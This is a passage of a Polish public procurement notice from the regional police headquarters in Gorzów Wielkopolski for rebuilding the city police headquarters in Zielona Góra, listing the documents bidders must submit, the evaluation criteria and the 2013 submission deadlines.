</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy P.z.p., o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy P.z.p. i niepodlegania wykluczeniu z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 2 ustawy P.z.p. - wzór stanowi załącznik nr 1 do WWD. W przypadku Wykonawców wspólnie ubiegający się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) oświadczenie składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej. 
2. Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - wzór stanowi zał. nr 2a do WWD. 
Z informacji zawartej w Wykazie oraz ze złożonych dowodów musi wynikać spełnianie warunku opisanego w pkt II ppkt 2.1) lit. a) WWD. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) warunek może być spełniony wspólnie przez wszystkich członków Konsorcjum/ wspólników Spółki cywilnej.
3. Wykaz wykonanych głównych usług, w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie - wzór stanowi zał. nr 2b do WWD; 
Z informacji zawartej w Wykazie oraz ze złożonych dowodów musi wynikać spełnianie warunku opisanego w pkt II ppkt 2.1) lit. b) WWD;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, Spółka cywilna) warunek może być spełniony wspólnie przez wszystkich członków Konsorcjum/ wspólników Spółki cywilnej.
4. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wzór stanowi zał. nr 3 do WWD. Z informacji zawartej w Wykazie musi wynikać spełnianie warunku opisanego w pkt II ppkt 2.2) WWD; 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, Spółka cywilna) warunek może być spełniony wspólnie przez wszystkich członków Konsorcjum/ wspólników Spółki cywilnej.
5. Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wzór stanowi zał. nr 4 do WWD). Ze złożonego oświadczenia musi wynikać spełnianie warunku opisanego w pkt II ppkt 2.2) WWD;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) warunek może być spełniony wspólnie przez wszystkich członków Konsorcjum/ wspólników Spółki cywilnej.
6. dot. opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - ze złożonego dokumentu musi wynikać spełnianie warunku opisanego w pkt II ppkt 2.3) WWD; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) warunek może być spełniony wspólnie przez wszystkich członków Konsorcjum/ wspólników Spółki cywilnej. Uwaga: ze złożonych dokumentów ubezpieczenia musi wynikać opłacenie ubezpieczenia. Jeżeli informacji o opłaceniu ubezpieczenia nie ma w samym dokumencie ubezpieczenia należy załączyć dokument potwierdzający jej opłacenie.
7. Dowodami, o których mowa w pkt V ppkt 1 lit. d) WWD, są:
a) poświadczenie;
b) w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit. a);
c) w przypadku zamówień na usługi - oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit. a);
d) w przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane lub usługi wskazane w Wykazie, o którym mowa w pkt V ppkt 1 lit. d) lub e) WWD, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ppkt 2 lit. a) - c) WWD;
e) dokumenty, o których mowa w § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013r. nr 0 poz. 231).
8. Dokumenty dotyczące przynależności do tej samej grupy kapitałowej:
a) Wykonawca, wraz z wnioskiem o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy P.z.p., (wzór zał. nr 5a do WWD) albo informację o tym, że nie należy do grupy kapitałowej (wzór zał. nr 5b do WWD). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej.
Uwaga: zgodnie z art. 24 ust. 2 pkt 5 ustawy P.z.p. z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz.U. Nr 50, poz. 331, z późn. zm.), złożyli odrębne oferty lub wnioski o dopuszczenie do udziału w tym samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy Wykonawcami w postępowaniu o udzielenie zamówienia.
9. Inny Podmiot (art. 26 ust. 2b ustawy P.z.p.)
a) Jeżeli Wykonawca przy realizacji zamówienia polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia (osobach zatrudnionych u innego niż Wykonawca pracodawcy) lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, musi do Wniosku załączyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Uwaga: Wykonawca musi przedłożyć oryginał zobowiązania podmiotu trzeciego własnoręcznie podpisanego przez osobę uprawnioną do jego reprezentacji (wyroki KIO z 5 maja 2011 r., sygn. akt KIO/UZP 822/11 oraz z 1 czerwca 2010 r., sygn. akt KIO/UZP 922/10).
b) Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy P.z.p., polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy P.z.p., Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda w przypadku warunków, o których mowa w art. 22 ust. 1 pkt 4 ustawy P.z.p. - dokumentów, o których mowa w pkt V ppkt 1 lit. h) WWD. 
c) Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy P.z.p. polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy P.z.p., a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt V ppkt 1 lit. b, c WWD i oświadczenia o braku podstaw do wykluczenia (na podst. § 3 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013r. nr 0 poz. 231). 
10. PONADTO, WYKONAWCA MUSI ZŁOŻYĆ:
1) w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - upoważnienie lub pełnomocnictwo, określające zakres czynności, do których jest umocowany;
2) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) - oświadczenie o woli współpracy Wykonawców wspólnie przystępujących do postępowania podpisane przez wszystkich Wykonawców. 
Oświadczenie musi zawierać następujące informacje: 
a) nazwy i adresy Wykonawców, którzy wspólnie przystępują do postępowania przetargowego;
b) wyznaczenie Lidera do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego wraz z nazwą zadania - tytułem postępowania. Osoba upoważniona przez Lidera do reprezentowania musi posiadać stosowne upoważnienie (zgodne z pkt V ppkt 5.1) WWD).
3) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Spółka cywilna) - upoważnienie lub pełnomocnictwo ustanawiające pełnomocnika do reprezentowania s.c. 
w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego.
Uwaga: dokumenty wymienione w pkt V ppkt 5.1) - 5.3) WWD Wykonawca musi przedłożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza (wyrok SO w Warszawie - SYGN. AKT V CA 85/07).
11. PONADTO ZAMAWIAJACY ZALECA ZAŁĄCZYĆ WRAZ Z W/W DOKUMENTAMI:
a) Wniosek o dopuszczenie do udziału w postępowaniu (zawierający co najmniej nazwę Wykonawcy/ Lidera Konsorcjum, adres Wykonawcy/ Lidera konsorcjum, NIP, nr telefonu kontaktowego, nr faks, adres e-mail). Zamawiający nie wymaga użycia określonego formularza do zgłaszanych przez Wykonawców Wniosków o dopuszczenie do udziału w postępowaniu.
12. Wykonawcy zagraniczni: 
a) Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy P.z.p. mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy P.z.p., wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, z tym że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.
b) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o którym mowa w pkt V ppkt 1 lit. b) i c) WWD (KRS lub CEIDG i KRK dla art. 24 ust. 1 pkt 9), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
c) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt V ppkt 1 lit. c) WWD (KRK dla art. 24 ust. 1 pkt 4 - 8 i KRK dla art. 24 ust. 1 pkt 10 i 11 ustawy P.z.p.), składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8, 10 i 11 ustawy P.z.p.
d) Dokumenty, o których mowa w lit. b) i c) niniejszego ppkt powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu 
o udzielenie zamówienia.
e) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w lit. b) i c) niniejszego ppkt zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis § 4 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013r. nr 0 poz. 231) stosuje się odpowiednio.
13. Dot. aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy P.z.p. - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka Cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej. WARUNEK AKTUALNOŚCI SPEŁNIAĆ BĘDZIE RÓWNIEŻ DOKUMENT WYSTAWIONY Z DATĄ WCZEŚNIEJSZĄ I POTWIERDZONY PRZEZ ORGAN WYDAJĄCY W WYMAGANYM TERMINIE;
14. Dot. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 oraz pkt. 10-11 ustawy P.z.p., w przypadku podmiotu zbiorowego również w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy P.z.p - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia; 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 8.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1) Ocena wniosków - oparta będzie na ocenie spełnia/nie spełnia wszystkich warunków. Jeżeli ilość wniosków spełniających minimalne wymagania będzie większa niż 8, Zamawiający dokona oceny złożonych wniosków wg kryterium: doświadczenie.
Kryterium oceny wniosków: doświadczenie - znaczenie 100%
Oceniając - doświadczenie wykazane w złożonych wnioskach, Zamawiający przyzna:
a) 2 pkt - za wymagane minimum, określone w pkt II ppkt 2.1) lit. a) oraz b) WWD (łącznie);
Uwaga: przepis art. 26 ust. 2 b ustawy P.z.p. pozwala na skorzystanie z zasobów podmiotów trzecich tylko w celu wykazania spełniania minimalnych warunków udziału w postępowaniu, natomiast nie jest dopuszczalne powołanie się na doświadczenie innego podmiotu, jeżeli miałoby to służyć wyłącznie otrzymaniu przez danego Wykonawcę większej liczby punktów, a w konsekwencji wyższej pozycji w rankingu Wykonawców. (KIO 331/12 -333/12; KIO1201/12)
b) 1 pkt - za każdą wykazaną ponad wymagane minimum robotę budowlaną, wykonaną w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) w obiekcie użyteczności publicznej o powierzchni użytkowej min. 1.500 m2 (każda), każda o wartości min. 7 mln zł brutto, zrealizowaną w 100% (prawidłowo ukończoną) - (potwierdzoną odpowiednimi dowodami określającymi, że robota ta została wykonana w sposób należyty oraz wskazującymi że została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona);
c) 0,5 pkt - za każdą wykazaną ponad wymagane minimum usługę wykonaną w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) polegającą na wykonaniu dokumentacji projektowej budowlanej i wykonawczej dotyczącej robót budowlanych w obiekcie użyteczności publicznej, zrealizowaną w 100% (dot. realizacji usługi projektowania) - (potwierdzoną odpowiednimi dowodami, że usługa ta została wykonana należycie);
d) Zamawiający zaprosi do składania ofert wyłącznie tych Wykonawców, którzy spełniają warunki udziału w postępowaniu oraz zdobędą najwyższą liczbę punktów. W przypadku, gdy nie będzie można dokonać zakwalifikowania 8 wniosków, z uwagi na to, że 2 lub więcej wniosków uzyskało taką samą liczbę punktów, Zamawiający spośród tych wniosków wybierze te, w których:
- łączna wartość brutto wykazanych na ponad wymagane minimum i podlegających punktacji robót budowlanych, o których mowa w ppkt b) niniejszego punktu, będzie najwyższa.
2) Ocena spełnienia warunków udziału w postępowaniu będzie odbywała się w oparciu o informacje zawarte w dokumentach i oświadczeniach żądanych zgodnie z Wykazem Wymaganych Dokumentów (WWD). Z treści dokumentów i oświadczeń złożonych na potwierdzenie spełniania warunków udziału w postępowaniu musi jednoznacznie wynikać, że Wykonawca spełnia wyżej postawione warunki. Ocena będzie dokonana na zasadzie spełnia/ nie spełnia - zgodnie z drukiem własnym Zamawiającego pt: Informacja o spełnianiu przez Wykonawców warunków udziału w postępowaniu prowadzonym w trybie przetargu ograniczonego - który będzie stanowił załącznik do protokołu postępowania w trybie przetargu ograniczonego zgodnego z Rozporządzeniem Prezesa Rady Ministrów z dnia 26 października 2010r. w sprawie protokołu postępowania o udzielenie zamówienia publicznego (Dz.U. z 2010r. nr 223 poz. 1458).</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: Zamawiający zamierza zastosować aukcję elektroniczną przy wyborze najkorzystniejszej oferty. Adres strony internetowej, na której będzie prowadzona aukcja elektroniczna: https:// aukcje.uzp.gov.pl.</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy P.z.p. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Szczegółowe warunki zmian zostaną określone w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający nie zamierza zamieszczać Specyfikacji Istotnych Warunków Zamówienia na stronie internetowej. SIWZ zostanie przekazana Wykonawcom zaproszonym do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 11:00, miejsce: Komenda Wojewódzka Policji - Zespół ds. Zamówień Publicznych, ul. Kwiatowa 10, 66-
400 Gorzów Wlkp., z widocznym dopiskiem na kopercie:WNIOSEK - Przebudowa KMP w Zielonej Górze - ZP-16/13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy P.z.p.), w języku polskim (art. 9 ust. 2 ustawy P.z.p.).
2. Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować w godzinach urzędowania Zamawiającego, tj. od godziny 7:30 do 15:30 w dni robocze, do Zespołu ds. Zamówień Publicznych: fax 095/7381435,
e-mail: zamowieniapubliczne@go.policja.gov.pl
lub na adres: Komenda Wojewódzka Policji, Zespół ds. Zamówień Publicznych, 
ul. Kwiatowa 10, 66-400 Gorzów Wlkp.
3. Korespondencja wniesiona do Zamawiającego pisemnie pocztą tradycyjną, za pośrednictwem kuriera, przesłana za pomocą faksu lub drogą elektroniczną po godzinach urzędowania (tj. która wpłynie do Zamawiającego po godzinie 15:30) zostanie zarejestrowana w następnym dniu pracy Zamawiającego.
4. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują sobie pisemnie, faksem lub drogą elektroniczną (art. 27 ust. 1 ustawy P.z.p.). Forma elektroniczna dokumentów spełnia warunek pisemności jeżeli jest opatrzona bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. W przypadku wysłania dokumentów faksem lub drogą elektroniczną konieczne jest dodatkowo wysłanie formy pisemnej pocztą tradycyjną, za wyjątkiem sytuacji, gdy forma elektroniczna dokumentów jest opatrzona bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
5. Zamawiający żąda od Wykonawcy potwierdzenia faktu otrzymania oświadczenia, wniosku, zawiadomienia lub informacji wysyłanych drogą elektroniczną lub faksem (art. 27 ust. 2 ustawy P.z.p.). 
6. Zamawiający nie zamierza zawrzeć umowy ramowej.
7. Zamawiający nie przewiduje udzielania zamówień uzupełniających.
9. Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 4 ustawy P.z.p.
10. Zamówienie nie dotyczy finansowania z UE.
11. Zabezpieczenie należytego wykonania umowy: Zamawiający żąda od wybranego Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy, najpóźniej w dniu zawarcia umowy, w wysokości 5% ceny całkowitej podanej w ofercie, w formie dozwolonej przez ustawę P.z.p. (art. 148 ustawy P.z.p.)
12. Termin składania ofert: nie krótszy niż 14 dni od dnia przekazania zaproszenia do złożenia oferty. 
13. Wykaz Wymaganych Dokumentów (WWD) wraz z załącznikami będącymi wzorami formularzy jest dostępny na stronie internetowej Zamawiającego www.lubuska.policja.gov.pl.
Ponadto WWD jest udostępniany Wykonawcom w formie papierowej lub elektronicznej na ich pisemny wniosek, który można kierować do Zamawiającego:
- faksem na nr: 095/7381435; - elektronicznie na adres e-mail: zamowieniapubliczne@go.policja.gov.pl; - pisemnie na adres: Komenda Wojewódzka Policji, Zespół ds. Zamówień Publicznych, ul. Kwiatowa 10; 66-400 Gorzów Wlkp. 
14. Zamawiający wykluczy z postępowania Wykonawców, którzy nie wykażą spełniania warunków udziału w postępowaniu (art. 24 ust. 2 pkt 4) i/lub nie wykażą braku podstaw do wykluczenia z postępowania o udzielenie zamówienia (art. 24 ust. 1) poprzez nie złożenie (lub złożenie nieprawidłowych) dokumentów żądanych przez Zamawiającego. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, Spółka cywilna) warunek braku podstaw do wykluczenia na podst. art. 24 ust. 1 musi być spełniony przez każdego z członków Konsorcjum/ wspólników Spółki cywilnej osobno.
15. Dokumenty należy złożyć w formie pisemnej (z zastrzeżeniem art. 27 ust. 5 ustawy P.z.p.), w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (z zastrzeżeniem dokumentów, wymienionych w pkt V ppkt 5.1) - 5.3) WWD). W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez Wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
15. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy P.z.p., kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
